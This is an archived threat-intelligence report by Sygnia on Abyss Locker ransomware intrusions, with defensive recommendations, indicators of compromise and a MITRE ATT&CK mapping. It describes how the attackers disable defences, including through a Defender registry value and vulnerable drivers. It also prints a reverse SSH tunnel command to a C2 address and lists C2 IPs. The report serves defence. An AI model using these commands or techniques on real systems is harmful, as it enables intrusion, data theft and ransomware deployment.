{
	"id": "621dc84a-7b44-4202-99b7-c3b889efecba",
	"created_at": "2026-04-06T02:12:29.480036Z",
	"updated_at": "2026-04-10T03:21:47.879039Z",
	"deleted_at": null,
	"sha1_hash": "399acba66ec6d9665953e1da31f5ea370cc039d6",
	"title": "The Anatomy of Abyss Locker Ransomware Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3110554,
	"plain_text": "The Anatomy of Abyss Locker Ransomware Attack\r\nBy Sygnia\r\nPublished: 2025-02-04 · Archived: 2026-04-06 01:57:50 UTC\r\nAbyss Locker ransomware targets critical network devices with swift, disruptive attacks. This blog breaks down its tactics and defense strategies.\r\nAbigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, Oren Biderman\r\n4 February 2025\r\n16 min\r\nExecutive Summary\r\nAbyss Locker (AKA Abyss ransomware) is a relatively new threat group that emerged in 2023, specializing in swift and decisive intrusions designed to cripple victims with ransomware.\r\nAbyss Locker was active throughout 2024, causing multiple incidents investigated by Sygnia. However, no recent technical blogs provide detailed insights into the group’s modus operandi.\r\nThe threat actors behind Abyss Locker consistently employ a TTP of deploying malware on critical network devices to tunnel their activity within the network. This includes targeting VPN appliances, network-attached storage (NAS) and ESXi servers.\r\nIn this blog, we break down the attack flow of an Abyss Locker ransomware intrusion, highlight common TTPs and provide actionable recommendations on how to defend against these techniques.\r\nIncident Attack Flow\r\nInitial Access\r\nSygnia has observed that Abyss Locker intrusions typically begin with the exploitation of unpatched VPN appliances. For example, the threat actor exploited known vulnerabilities, such as CVE-2021-20038, in an unpatched SonicWall VPN appliance. By exploiting the VPN appliance, the threat actor gained access to internal network devices and hosts, deploying additional tunneling tools to maintain persistence and facilitate further access.\r\nCredential Harvesting\r\nOnce inside the compromised network, Abyss Locker frequently targets backup appliances. 
These appliances often utilize high-privileged service accounts, which are required for access to network resources for backup operations. The threat actor has been observed multiple times leveraging several modified versions of ‘Veeam-Get-Creds.ps1’ [1], an open-source PowerShell tool available in the ‘Veeam Credential Recovery’ GitHub project [2], to harvest credentials of local and domain accounts stored in the Veeam backup system.\r\nIn one instance, a PowerShell script named ‘veeam11.ps1’, which shared significant code similarities with ‘Veeam-Get-Creds.ps1’, was executed.\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 1 of 13\n\nFigure 1: Snippet from Windows event log showing the execution of the PowerShell script ‘veeam11.ps1’.\r\nIn another instance, an obfuscated version of ‘Veeam-Get-Creds.ps1’ was deployed.\r\nFigure 2: Snippet from Windows event log showing the execution of obfuscated ‘Veeam-Get-Creds.ps1’.\r\nAnother credential harvesting technique observed involved remotely dumping the Windows Security Account Manager (SAM) and Security registry hives on compromised hosts to obtain credential material.\r\nDefense Evasion\r\nThe threat actors behind Abyss Locker employ multiple techniques to evade detection and disable security controls on compromised hosts:\r\nDisable Windows Defender by setting the ‘DisableAntiSpyware’ value under the registry key ‘HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender’ to ‘1’.\r\nRemove EDR agents or stop their process by using the Task Manager or running as the SYSTEM account on compromised devices.\r\nUse Bring Your Own Vulnerable Driver (BYOVD) techniques to disable endpoint protection controls. 
For example:\r\nThe ‘UpdateDrv.sys’ driver from Zemana Anti-Logger was observed being used to install a malicious service (‘UpdateSVC’) that disables security controls.\r\nAdditional vulnerable drivers, such as ‘ped.sys’ (from Process Explorer) and ‘3ware.sys’, were also leveraged for similar purposes.\r\nDeploy and execute anti-virus and EDR killer executables such as ‘SophosAV.exe’ and ‘auSophos.exe’ to disable endpoint protection on compromised devices.\r\nCommand and Control Tools\r\nDuring their intrusions, Abyss Locker operators deploy multiple tools and malware to maintain persistence using centralized focal points for Command-and-Control (C2) communications.\r\nSygnia observed a heavy reliance on SSH/SOCKS tunneling, using open-source tools such as Chisel [3] and the native SSH binary. After gaining access to the environment and performing reconnaissance, these tunneling tools are strategically deployed on critical network devices, including ESXi hosts, Windows hosts, VPN appliances, and network-attached storage (NAS) devices.\r\nBy targeting these devices, the attackers ensure robust and reliable communication channels to maintain access and orchestrate their malicious activities across the compromised network.\r\nFigure 3: Diagram illustrating the different tunneling methods used by the threat actor.\r\nWindows SSH Tunneling Backdoor\r\nThe threat actors deployed an OpenSSH-based tool on Windows hosts to act as an SSH tunnel via remote port-forwarding, in order to maintain a connection to a remote C2 server. 
A PowerShell script named ‘deploy443.ps1’ was used to install the tool on compromised assets as a persistent service under the name ‘WMI Helper Agent’.\r\nThis deployment PowerShell script leveraged the executable ‘WinSW-x64.exe’ from the ‘Windows Service Wrapper in a permissive license’ GitHub project [4], which is designed to wrap and manage any application as a Windows service. To evade detection, the executable was named ‘wmihelper.exe’, mimicking the legitimate WMIHelper process.\r\nFigure 4: Snippet from the PowerShell script ‘deploy443.ps1’ showing the GitHub project URL of the Windows Service Wrapper executable.\r\nAdditionally, the ‘deploy443.ps1’ script created several supporting files for the service setup, including a configuration XML file named ‘wmihelper.xml’, which defined the service parameters. These parameters include:\r\nThe C2 server IP address and port for the reverse shell: 64.95.12[.]57:443.\r\nThe private key used for the SSH session authentication, stored at ‘C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Wmi\\wmihelper.key’.\r\nThe SSH remote port-forwarding – using multiple different ports such as 43801.\r\nFigure 5: Snippet from the configuration file ‘wmihelper.xml’ showing the SSH remote port-forwarding command line.\r\nESXi SSH Tunneling\r\nAbyss Locker often targets VMware ESXi appliances within target networks. These appliances are both reliable and stable within the network and provide access to the internal virtual servers hosted on them. 
Sygnia observed that the attackers often achieve compromise by tunneling through the organization’s VPN and pivoting to the VMware ESXi host, where they set up an additional SSH tunnel.\r\nFigure 6: Illustration showing the SSH tunneling involving the VPN appliance and ESXi host.\r\nIf SSH access is disabled on the ESXi host, the threat actor enables it by initiating the SSH daemon ‘sshd’ process. Once SSH access is established, they utilize the native SSH binary to connect to their Command-and-Control (C2) server, leveraging the ESXi host as a pivot point to scan the network.\r\nFigure 7: Snippet from the ‘hostd.log’ file on the ESXi host showing that SSH access was enabled.\r\nFigure 8: Snippet from the authentication log showing the SSH session authentication to the ESXi server.\r\nTo establish a reverse SSH tunnel back to their C2 server, the threat actor executes a command similar to ‘SSH -p 443 -N -f -o ServerAliveInterval=240 -o StrictHostKeyChecking=no -R 127.0.0.1:48000 support@64.95.12[.]70’.\r\nFigure 9: Snippet from the authentication log showing the SSHD connections to internal servers.\r\nNAS Device Tunneling Tool\r\nNAS devices are another common target exploited by Abyss Locker. These devices are often used as pivot points to tunnel traffic into the corporate network, enabling further intrusion and lateral movement. The observed compromise flow on these devices typically involves the following steps:\r\n1. Access the NAS web interface (e.g., ‘DiskStation Manager – DSM’) using the ‘admin’ account from an internal IP address.\r\n2. Enable the SSH service through the DSM.\r\n3. Connect to the NAS device via SSH.\r\n4. 
Create a backdoor user named ‘support’ and add this account to a privileged group.\r\nFigure 10: Snippet from the ‘synoconndb’ log from the NAS server showing that the SSH service was enabled.\r\nAfter compromising the NAS devices, the threat actor deploys a tunneling tool, often using ‘Chisel’, an open-source utility [5] that enables tunneling, to connect the asset to their C2 infrastructure. To evade detection, the threat actor often renames these tools as legitimate processes, such as ‘apache2’.\r\nNext, the threat actor attempts to clear the bash history on the compromised devices to remove traces of their activities and reduce the likelihood of detection.\r\nFigure 11: Snippet from Bash history of the NAS server showing the deployment of the ‘Chisel’ tool renamed as ‘apache2’.\r\nFigure 12: Snippet from Bash history of the NAS server showing the attempts to clear bash history.\r\nLateral Movement\r\nAbyss Locker leverages multiple off-the-shelf tools to move laterally within the network, primarily relying on compromised credentials to access and navigate between devices. Commonly used tools include PsExec, and scripts from the open-source project Impacket [6] such as SMBExec and ATExec.\r\nThe execution of PsExec results in the creation of key files on the target machine, which include the hostname of the source host in its filename. These hostnames are in fact machines that belong to the threat actor.\r\nFigure 13: Snippet showing USN Journal entry of PsExec .key file with the source host ‘ADMINIS-F69E5L3’.\r\nFigure 14: Snippet showing USN Journal entry of PsExec .key file with the source host ‘DESKTOP-VM4QKN6’.\r\nExfiltration\r\nTo exfiltrate data from the network, Abyss Locker utilizes the command-line tool ‘Rclone’ [7]. 
Consistent with their approach to evasion, the threat actors rename the ‘Rclone’ executable to other names such as ‘ltsvc.exe’ to evade detection. Using ‘Rclone’, the threat actor exfiltrates stolen data primarily to two legitimate cloud storage providers: Amazon Web Services (AWS) and BackBlaze. The tool was configured with filters to target specific file extensions, allowing the threat actors to selectively exfiltrate data of interest while avoiding unnecessary files.\r\nFigure 15: A snippet of the help documentation for ‘ltsvc.exe’ showing identical content to that of RClone.\r\nFigure 16: Snippet showing the content of the filter XML file used with RClone to control the type of files being exfiltrated.\r\nEncryption\r\nAfter achieving full access to the network and exfiltrating sufficient data, Abyss Locker deploys its ransomware. The ransomware targets both Windows systems and ESXi hosts, using distinct file extensions for encrypted files:\r\n‘.Abyss’ on Windows systems\r\n‘.crypt’ on ESXi hosts\r\nAs part of the encryption process, the ransomware creates ransom notes on compromised systems under the name ‘WhatHappened.txt’. Additionally, Abyss Locker attempts to delete volume shadow copies from affected hosts, hindering data recovery efforts.\r\nDefending Against Abyss Locker\r\nThe following recommendations reflect Sygnia’s strategic approach to mitigating Abyss Locker and similar threat actors. Rooted in security best practices, they align with a recommended security baseline to strengthen your organization’s resilience against advanced ransomware threats.\r\nPrevent\r\n1. Secure Edge Devices: Limit traffic to essential protocols, block access to management interfaces, use Geo-IP restrictions, and configure firewalls to inspect traffic and block management ports.\r\n2. 
Implement Network Segmentation: Micro-segment critical infrastructure into isolated VLANs to inhibit lateral movement, separate management from backup traffic using firewalls, and enforce inter-VLAN communication through stateful firewalls permitting only essential traffic.\r\n3. Protect Credentials: Enforce PAM solutions, mitigate SAM dumping with Credential Guard, reduce local admin privileges, and audit registry access attempts.\r\n4. Ensure Backup Security: Use immutable storage with AES-256 encryption and isolate backups in dedicated VLANs with strict firewall rules.\r\n5. Protect Endpoints: Remove vulnerable drivers, restrict kernel-mode driver installation, enable tamper protection in EDR solutions, and enforce execution of only signed, approved binaries through application control policies.\r\nDetect\r\n1. Monitor Activity on Edge Devices: Monitor SSH and SOCKS tunneling activity with tools like Chisel and filter DNS traffic for anomalous C2 queries using tools like Cisco Umbrella or OpenDNS.\r\n2. Monitor ESXi and NAS: Monitor ESXi logs for unauthorized SSH access or administrative changes, and configure alerts for NAS configuration changes, creation of new user accounts, or log tampering attempts. For a guide on monitoring and conducting threat hunting on ESXi devices, refer to Sygnia’s blog: https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/\r\n3. Forward Logs for Analysis: Deploy Sysmon (Windows) or Auditd/Osquery (Linux) for monitoring, and forward logs to a centralized SIEM to detect ransomware behaviours like rapid file changes or malicious script execution.\r\n4. Enable Backup Tampering Detection: Set alerts for suspicious backup activities, such as mass deletion or retention policy changes, and enable immutable logging for all backup operations.\r\nGovern\r\n1. 
Implement Access Governance: Implement strict RBAC across critical systems, enforce MFA for management interfaces secured via jump servers, and use authentication silos to restrict service account logins.\r\n2. Conduct Timely Patch Management and Vulnerability Mitigation: Patch critical systems within seven days of release or immediately for known exploits, and conduct regular vulnerability scans, prioritizing remediation.\r\n3. Require Privileged Identity Management (PIM): Require one-time passwords for privileged accounts and regularly audit them to remove unused or excessive permissions.\r\nAppendix I – Indicators of Compromise\r\nDescription | Type | Indicator of Compromise\r\nBackdoor (wmihelper.exe) | File | c:\\users\\\u003cUSER\u003e\\appdata\\roaming\\microsoft\\wmi\\wmihelper.exe\r\nBackdoor (wmihelper.exe) | File | C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Wmi\\wmihelpe\r\nBackdoor (wmihelper.exe) | SHA1 | 59a97f9d7c1d6e10fa41ea9339568fb25ec55e27\r\nBackdoor (wmihelper.exe) | SHA256 | 05b82d46ad331cc16bdc00de5c6332c1ef818df8ceefcd49c726553209b3a0da\r\nBackdoor (wmihelper.exe) | Service Name | WMI helper agent\r\nBackdoor Config File (wmihelper.exe) | File | wmihelper.xml\r\nBackdoor authentication private key (wmihelper.exe) | File | wmihelper.key\r\nBackdoor (chisel) | File | /bin/apache2\r\nBackdoor (chisel) | SHA1 | 3f90fd241e9422cc447b5ccdcb87d72507f37e6f\r\nBackdoor (chisel) | SHA256 | 6042a84529958a04a2d46384139da3ef016bf9498e791cd5e34dfecec2baa1d2\r\nRemcom | File | C:\\Windows\\uFmAnlZR.exe\r\nRemcom | SHA1 | 23873bf2670cf64c2440058130548d4e4da412dd\r\nRemcom | SHA256 | 3C2FE308C0A563E06263BBACF793BBE9B2259D795FCC36B953793A7E499E7F71\r\nLinux encryptor | File | /tmp/e.elf\r\nLinux encryptor | SHA1 | 
e44ec82d0d80c754afcd7ed149c263c55d158259\r\nLinux encryptor | SHA256 | 5fba25759423f9efc92592977f6c9ff77d47a20aa8ec8e9cd17d5cfa786a1852\r\nWindows encryptor | File | C:\\Users\\\u003cUSER\u003e\\Desktop\\e\\e.exe\r\nWindows encryptor | SHA1 | 13112e672d807fa7c7f8a383ecfa31e85b880e5a\r\nWindows encryptor | SHA256 | cd9d88cccd85209966c5a35aba7751b962bcc021a4216d6addfc0c3462ce80da\r\n‘Rclone’ utility | File | C:\\Windows\\System32\\rclone\r\n‘Rclone’ utility | File | C:\\Windows\\System32\\LTSVC.exe\r\n‘Rclone’ utility (Filter file) | File | C:\\Windows\\System32\\filter.txt\r\nAnti-virus killer | File | C:\\Windows\\Temp\\SophosAV.exe\r\nAnti-virus killer (SophosAV.exe) | Service Name | Sophos AV\r\nAnti-virus killer | File | C:\\ProgramData\\USOShared\\auSophos.exe\r\nAnti-virus killer | File | C:\\ProgramData\\USOShared\\UpdateSvc.exe\r\nAnti-virus killer (UpdateSvc.exe) | SHA256 | f9ab649acfe76d6ac088461b471e5d981bdc8b71d940e94c63bc1988a2ed4678\r\nAnti-virus killer (UpdateSvc.exe) | Service Name | UpdateSVC\r\nSecurity control disabling tool (powerrun) | File | c:\\programdata\\pr.exe\r\nSecurity control disabling tool (powerrun) | SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b\r\nSecurity control disabling tool (powerrun) | SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2\r\nMalicious PowerShell script | File | C:\\ProgramData\\deploy443.ps1\r\nVeeam-Get-Creds.ps1 | File | veeam11.ps1\r\nVulnerable driver | File | C:\\ProgramData\\USOShared\\UpdateDrv.sys\r\nVulnerable driver (UpdateDrv.sys) | SHA256 | d48c7f13db60ef615e59773c442485e84acef09343375d0d8a462b285e959baa\r\nVulnerable driver | File | ped.sys\r\nVulnerable driver (ped.sys) | SHA1 | 17d9200843fe0eb224644a61f0d1982fac54d844\r\nVulnerable driver (ped.sys) | SHA256 | 
d76c74fc7a00a939985ae515991b80afa0524bf0a4feaec3e5e58e52630bd717\r\nVulnerable driver | File | 3ware.sys\r\nVulnerable driver (3ware.sys) | SHA1 | 82780c0c1c0e04d994c770a3b3e73727528b0451\r\nVulnerable driver (3ware.sys) | SHA256 | 0d9089efe2a28630bc21d8db451ec14dc856c2d40444292c42e7cca218c7029e\r\nHostname | Host name | DESKTOP-VM4QKN6\r\nHostname | Host name | ADMINIS-F69E5L3\r\nC2 | IP Address | 139.180.135.191\r\nC2 | IP Address | 67.217.228.101\r\nC2 | IP Address | 64.95.12.57\r\nC2 | IP Address | 64.95.12.70\r\nAppendix II: MITRE ATT\u0026CK Matrix Mapping\r\n1. Initial Access\r\nT1133 – External Remote Services\r\n2. Persistence\r\nT1543.003 – Create or Modify System Process: Windows Service\r\nT1136.001 – Create Account: Local Account\r\n3. Privilege Escalation\r\nT1078 – Valid Accounts: Local Accounts\r\nT1068 – Exploitation for Privilege Escalation\r\n4. Defense Evasion\r\nT1562.001 – Impair Defenses: Disable or Modify Tools\r\nT1036.005 – Masquerading: Match Legitimate Name or Location\r\n5. Credential Access\r\nT1555 – Credentials from Password Stores\r\nT1003.002 – OS Credential Dumping: Security Account Manager (SAM)\r\n6. Discovery\r\nT1046 – Network Service Discovery\r\n7. Lateral Movement\r\nT1021.001 – Remote Services: Remote Desktop Protocol\r\nT1021.004 – Remote Services: SSH\r\nT1570 – Lateral Tool Transfer\r\n8. Collection\r\nT1005 – Data from Local System\r\nT1039 – Data from Network Shared Drive\r\n9. Command and Control\r\nT1071.001 – Application Layer Protocol: Web Protocols\r\nT1219 – Remote Access Software\r\nT1572 – Protocol Tunneling\r\n10. Exfiltration\r\nT1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\n11. 
Impact\r\nT1486 – Data Encrypted for Impact\r\nT1490 – Inhibit System Recovery\r\nAppendix III – Mapping Attack Techniques to Mitigations\r\nAttack Technique | Prevent | Detect | Govern\r\nExploiting unpatched VPN appliances | Patch VPN appliances and implement firewalls/WAFs; restrict management port access. | Monitor and alert for anomalies in VPN traffic; inspect logs for management access attempts. | Apply patches promptly and conduct vulnerability scans regularly.\r\nCredential harvesting via SAM dumping | Implement Credential Guard; enforce PAM for service and local admin accounts. | Audit access to SAM and Security registry hives; analyze logs for credential dumping attempts. | Audit and reduce privileges of admin accounts; enforce password rotation policies.\r\nDisabling endpoint protection | Configure tamper protection for EDR solutions; disable vulnerable drivers. | Forward logs to SIEM for tamper detection; monitor EDR events for disabling attempts. | Use authentication silos to restrict privileged access; enforce RBAC policies.\r\nSSH/SOCKS tunneling for C2 | Restrict SSH/SOCKS traffic using firewalls; micro-segment critical infrastructure. | Configure alerts for SSH/SOCKS activity; monitor DNS queries for unusual domains. | Establish strict RBAC for critical assets; mandate MFA for all management access.\r\nTargeting NAS and ESXi devices | Enforce immutable storage; isolate NAS and ESXi VLANs with strict firewall rules. | Monitor NAS/ESXi logs for unauthorized access and configuration changes. | Regularly audit NAS and ESXi accounts and configurations for compliance.\r\nEncrypting backups to prevent recovery | Use immutable 
storage and isolate backup systems from the production network. | Set alerts for modifications to backup policies or deletion of backups. | Review and enforce backup access policies; mandate audits for recovery readiness.\r\nLateral movement using compromised credentials | Restrict account access using ‘Log On To’ policies; enforce MFA for privileged access. | Correlate lateral movement attempts in SIEM; monitor anomalous logins or access attempts. | Conduct regular audits of privileged accounts; enforce role-based permissions.\r\nPersistent foothold through edge devices and NAS | Block egress traffic from edge devices and NAS using restrictive firewall rules. | Monitor unusual outbound traffic from edge devices and NAS; alert for unauthorized external connections. | Establish strict egress policies for edge devices and NAS; regularly audit outbound firewall rules.\r\nIf you were impacted by this attack or are seeking guidance on how to prevent similar attacks, please contact us at contact@sygnia.co or our 24-hour hotline +1-877-686-8680.\r\nContributors: Eldad Hoshen, Ofir Almkias, Luis Garcia.\r\n1. https://github.com/sadshade/veeam-creds/blob/main/Veeam-Get-Creds.ps1\r\n2. https://github.com/sadshade/veeam-creds\r\n3. https://github.com/jpillora/chisel\r\n4. https://github.com/winsw/winsw\r\n5. https://github.com/jpillora/chisel\r\n6. https://github.com/fortra/impacket\r\n7. https://github.com/rclone/rclone\r\nThis advisory and any information or recommendation contained herein has been prepared for general informational purposes and is not intended to be used as a substitute for professional consultation on facts and circumstances specific to any entity. 
While we have made attempts to ensure the information contained herein has been obtained from reliable sources and to perform rigorous analysis, this advisory is based on initial rapid study, and needs to be treated accordingly. Sygnia is not responsible for any errors or omissions, or for the results obtained from the use of this Advisory. This Advisory is provided on an as-is basis, and without warranties of any kind.\r\nSource: https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/"
	],
	"report_names": [
		"abyss-locker-ransomware-attack-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775441549,
	"ts_updated_at": 1775791307,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/399acba66ec6d9665953e1da31f5ea370cc039d6.pdf",
		"text": "https://archive.orkl.eu/399acba66ec6d9665953e1da31f5ea370cc039d6.txt",
		"img": "https://archive.orkl.eu/399acba66ec6d9665953e1da31f5ea370cc039d6.jpg"
	}
}